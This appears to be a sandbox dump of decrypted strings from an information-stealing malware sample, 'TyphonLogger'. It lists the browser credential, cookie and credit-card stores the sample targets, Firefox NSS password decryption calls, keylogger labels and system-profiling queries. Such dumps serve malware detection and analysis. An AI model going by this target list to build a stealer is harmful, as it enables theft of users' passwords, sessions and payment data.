                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1bqKXeYj9n9t81fnHfPVtb30McKY692x/U6A9oLJhSB9tYQTQIaxHaFD4kv2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1brpEsA/sitn702jFODCt7PhNd60o8uzr3vJpsyGuHlA5ZMVSpeTNLwCpkv2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 1af0D797r2Iyt1D6TKua5uGsbZH6vpnoshKN65nU62kv+P1cEsvCbPMfu1b2WQ==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ============ User Info ============
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: User Name =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Machine Name =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Current Language =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Installed Languages =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Current Date =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ===================================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: =========== System Info ============
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: HWID =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: System Version =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Processor =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Graphics card =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Memory amount =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Anti-Virus =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Battery status =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Screen size =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: =========== Network Info ============
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Public IP =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Private IP =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Gateway IP =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: MAC address =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: BSSID =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: lKf0D797r2Iyt1DnNvPI9pD+M82z6su7r0besMvJ62kv+P1cEsvCbPMf
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Country =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Country ISO =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Region =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: City =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ZIP code =
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \System Info.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Installed Software.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_Product
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: >
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ;
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Faxxxxxxilxxxxexd xxtxxxxxxxxxxxxxxxo gxxxxxxxxxxxxxexxxxxxxxxxxxxxxxt laxxxxxxxxxxxxxxxxxxxxxxnxxxxxxgxxxxxxxxxxuxxxxxxxxxxxxxxxxaxxxxxxxxxxgxesx
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 4dubdtUHwBpTzgi0EuTOq6j4P8Kb0N2m+0rdiueMuCBgpKwxXZmcNL1R6RnWYw==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Identifier
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Unknown
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxysxxxxxxxxxxxxxxtxxxxexxxxxxxxm
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: root\CIMV2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM win32_operatingsystem
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 5/XpXOcy5TB94U2mFffXr7njI4yw6tC9r07e9u25oGAypKQFXZOMIu5L6Ev+Ozcu0HVn5xZUhg==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: aHR0cDovL2FwaS5pcGlmeS5vcmc=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: kw==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \root\SecurityCenter2
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Select * from AntivirusProduct
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: displayName
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Not installed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: country_name
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: country_code
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: region
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: postal
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ipapi.co /#c-sharp-v1.03
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: +v+lV+Eysg995Q6iAuXIqZX1cOq17Mn12Ebe5Za2piZ9pqUSXJmN
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProcessorId
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_Processor
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Select * From Win32_ComputerSystem
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: TotalPhysicalMemory
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_VideoController
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: , (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: %)
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd.MM.yyyy HH:mm:ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_Process Where SessionId='{0}'
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PID:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProcessId
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Process Name:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Executable Path:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ExecutablePath
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: =================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Process List.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Screenshot.jpg
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Screenshot
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: _dd.MM.yyyy-HH.mm.ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .jpg
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Current title matches Smart Logger target
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ### (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy HH-mm-ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Screenshots
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy HH:mm:ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy dd-mm-ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \BuildTag.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Space
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Return
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Escape
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: LControlKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: RControlKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: RShiftKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: LShiftKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Tab
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Capital
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [ENTER]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [ESC]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CTRL]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Shift]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Back]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [WIN]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Tab]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CAPSLOCK: ON]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CAPSLOCK: OFF]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ###
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ###
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Unknown
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Battle.net
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chromium\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Google\Chrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Google(x86)\Chrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Opera Software\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \MapleStudio\ChromePlus\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Iridium\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \7Star\7Star\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CentBrowser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chedot\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Vivaldi\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Kometa\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Elements Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Epic Privacy Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \uCozMedia\Uran\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9dysXPAv4H9G5A6bIvrCsqz/Od7y39ew+1vZuMO1uzt2sKwEXKq8ObxN6wL/PgRnxntx4Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CatalinaGroup\Citrio\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Coowon\Coowon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \liebao\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \QIP Surf\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Orbitum\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\Dragon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Amigo\User\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Torch\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Yandex\YandexBrowser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \360Browser\Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Maxthon3\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \K-Melon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Sputnik\Sputnik\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Nichrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CocCoc\Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Uran\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chromodo\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Mail.Ru\Atom\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9di7U/QjwTBp/hqmA/P7ma7wJsnqwda6+FzVpPi8pTFg5YQAW5c=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Microsoft\Edge\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9dSfe8YP039M5R+3HuTGr7X+PvCJ1e2Rxm6QkcGvuSZxoOAkV4aaI6dH6Ajv
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Steam
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CryptoTab Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Mozilla\Firefox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Waterfox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \K-Meleon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Thunderbird
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\IceDragon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \8pecxstudios\Cyberfox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \NETGATE Technologies\BlackHaw
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Moonchild Productions\Pale Moon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Opera Software
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Web Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Login Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Network\Cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Local State
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Credit Cards
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Credit Cards\CreditCards_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: )_[
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ].txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Passwords.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Cookies\Cookies_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \ImportantAutofills.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Autofills
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Autofills\Autofills_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: logins
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: origin_url
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: username_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: password_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: credit_cards
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: name_on_card
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expiration_month
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expiration_year
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: host_key
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expires_utc
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: secure
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encrypted_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Opera
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: os_crypt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encrypted_key
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Browser path:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: does not exist
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Thunderbird
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cookies.sqlite
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: moz_cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to copy files to decrypt passwords
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: logins.json
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,"logins":\[
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,"potentiallyVulnerablePasswords"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: },
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to set _profiles!
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encryptedUsername
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encryptedPassword
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Firefox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: K-Melon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: IceDragon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Blackhawk
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Pale Moon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: key3.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: key4.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cert9.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ":"([^"]+)"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \mozglue.dll
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \nss3.dll
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: NSS_Init
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PK11SDR_Decrypt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: NSS_Shutdown
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to load NSS
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: y
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PROCESSOR_ARCHITEW6432
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProgramFiles(x86)
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: C:\Users\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \AppData\Roaming
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \logins.json
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \key4.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \places.sqlite
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: table
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: UNIQUE
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: false
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \n
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \r
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \t
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \b
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \f
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \u
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: X4
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JSON Parse: Too many closing brackets
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JSON Parse: Quotation marks seems to be messed up.
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: :
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvMAlgfv13A83ZscbCVMycz94ox9Y8wNb9TDUtpV4XvjbwHAJGfRc0wQGM/YxT/Ww==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvPAVoTv17H93E5H7CLMgZ+9Yh49ZExM7UbR0poUM7w4boZEJfUWcAQR3MlYRK2AxLU/HzEdp+KxQoGW2RA6Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvNC1kUv1zJ8XNscLmXOicx/Ykz9Y80M7VTDUtqX9CCiqcNdLGeWokRE28qYhL+Sx3T/zfZFJ6WgGNEWWdB+4yNrUDxK6wswWPc26rgoR2RtL2ZpBj4iQqvWyu6SGIUwPu5ElwpdUJw0boW10NHNm2KbclKja+2AygEYfKF0znynduHd9mgTH1pkKNPtfoqta6i27cd549USMPYQzPQeNBJtIUKQawdWNnoRLIvDV6PN7oiq1iQTTIC4/Ei+hWJ9UYQcMrIbk9mdU5fGEIf1WvXLEEWUDTs8FdlNw==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvGCF1880XJnD0hdv2ONGFe9Jc81MI0fa8QR0kEV9Ts59EEBPPyE8VZRnI3
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: {0}TRUE{1}FALSE{2}{3}{4}
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Name: {0}Value: {1}Application: {2}Stolen by: TyphonLogger V1==========================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: email
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: e-mail
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: phone
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: usrname
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: login
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: address
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: creditcard
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dob
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: pin
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: zip
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: paypal
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: crypto
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Name: {0}Value: {1}Stolen by: Log v2==========================
